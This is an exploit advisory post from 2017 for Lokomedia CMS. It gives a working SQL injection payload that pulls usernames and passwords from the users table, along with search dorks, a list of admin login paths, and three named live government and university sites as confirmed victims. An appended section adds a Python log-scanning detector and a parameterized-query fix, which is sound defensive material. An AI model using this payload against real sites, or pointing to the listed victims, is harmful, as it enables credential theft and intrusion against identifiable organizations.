Sunday, 01 October 2017

[Exploit] Lokomedia CMS, CMS Remote SQL Injection Exploit Vulnerability



###########################
# Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability
###########################



=========================================================
[+] Title :- Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability
[+] Vendor Homepage :- http://www.bukulokomedia.com/
[+] Version :- All Versions
[+] Tested on :- Linux - Windows - Mac
[+] Category :- webapps
[+] Exploit Author :- K33P-S1L3NT
[+] Team name :- Ternate Lab Pentesting
[+] Official Page :- www.facebook.com/loading.gov/
[+] Available :- sql injection cheat sheet | sql injection Remote exploit
[+] Greedz to :- Indonesian People | Sarang-Paniki | Sarang-Bifi | Kamar-Muka | DZ hacker's | Algerian Hack 
[+] Contact :- aurorakoizora@gmail.com

=========================================================
[+] Severity Level :- Medium

[+] Request Method(s) :- GET / POST

[+] Vulnerable Parameter(s) :- id
      statis-1-profil.html (string)
      statis-3-strukturorganisasi.html (string)
      statis-1-visimisi.html (string)
      statis-1-tujuan.html (string)

[+] Dork :-
      statis-1-profil.html (works 100%)
      statis-3-strukturorganisasi.html (works 100%)
      statis-1-visimisi.html (works 100%)
      statis-1-tujuan.html (works 100%)

[+] Local Admin 
     /redaktur
     /adminweb
     /administrator
     /redaktur/index.php
     /adminlogin
     /admin
     /login.php

[+] Affected Area(s) :- Entire admin, database, Server

[+] About :- Unauthenticated SQL injection via multiple PHP files, causing an SQL error

[+] SQL vulnerable File :- /home/user/public_html/XXX.php

[+] POC : http://127.0.0.1/statis-1( exploit-code )profil.html
              - http://127.0.0.1/statis-3( exploit-code )strukturorganisasi.html
              - http://127.0.0.1/statis-1( exploit-code )visimisi.html
              - http://127.0.0.1/statis-1( exploit-code )tujuan.html

########################################################
[+] Exploit 

/statis-1'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

##########################################################
[+] Testing 

http://127.0.0.1/statis-1'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+profil.html

[+] NOTE 
 Usernames and passwords are shown in the title bar; press CTRL+U to view them in the page source.

###########################################################
[+] LIVE 

http://portal.ukit.ac.id ( Title-bar http://i.imgur.com/mYXPvpG.png ) ( CTRL+U http://i.imgur.com/2zKzC5o.png )
http://www.ptun-padang.go.id ( Title-bar http://i.imgur.com/3ZdoHaI.png ) ( CTRL+U http://i.imgur.com/eX1qKc5.png )
http://www.anambaskab.go.id ( Title-bar http://i.imgur.com/o4gQd0o.png ) ( CTRL+U http://i.imgur.com/WOriRul.png )
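
Added example (not part of the original advisory): every legitimate URL listed above has the form statis-<digits>-<slug>.html, so a defender can flag access-log requests to statis-* paths whose id segment is not purely numeric. The combined log format, the sample lines and the function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Shape of the legitimate URLs listed in the advisory: statis-<digits>-<slug>.html
LEGIT = re.compile(r"/statis-\d{1,10}-[A-Za-z0-9_-]+\.html")
# Assumed combined/common log format: client IP, quoted request line, status code
LOG = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<req>[^"]*)" (?P<status>\d{3})')


def decode_fully(path, rounds=3):
    """Percent-decode repeatedly so %2527-style double encoding is unwrapped."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def suspicious_requests(lines):
    """Return (ip, status, decoded_path) for statis-* requests with a non-numeric id."""
    hits = []
    for line in lines:
        m = LOG.match(line)
        if not m:
            continue
        parts = m.group("req").split(" ")
        if len(parts) < 2:
            continue
        # Drop the method and the trailing protocol token; keep raw spaces in the target
        last = -1 if parts[-1].startswith("HTTP/") else len(parts)
        target = " ".join(parts[1:last])
        path = decode_fully(target.split("?", 1)[0])
        if path.lower().startswith("/statis-") and not LEGIT.fullmatch(path):
            hits.append((m.group("ip"), int(m.group("status")), path))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE = [
    '198.51.100.7 - - [01/Oct/2017:10:00:01 +0700] "GET /statis-1-profil.html HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Oct/2017:10:00:05 +0700] "GET /statis-1%27union+select+1--+profil.html HTTP/1.1" 200 6044',
    '203.0.113.9 - - [01/Oct/2017:10:00:09 +0700] "GET /statis-3%2527-strukturorganisasi.html HTTP/1.1" 200 4100',
    '198.51.100.7 - - [01/Oct/2017:10:00:12 +0700] "GET /berita-12-judul.html HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, status, path in suspicious_requests(SAMPLE):
        print(ip, status, path)
```

A flagged request answered with status 200 warrants a review of the response body and a reset of the credentials in the users table. On the application side, the fix is to validate id as an integer and pass it to the database through a parameterized query.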

Hope this is useful :D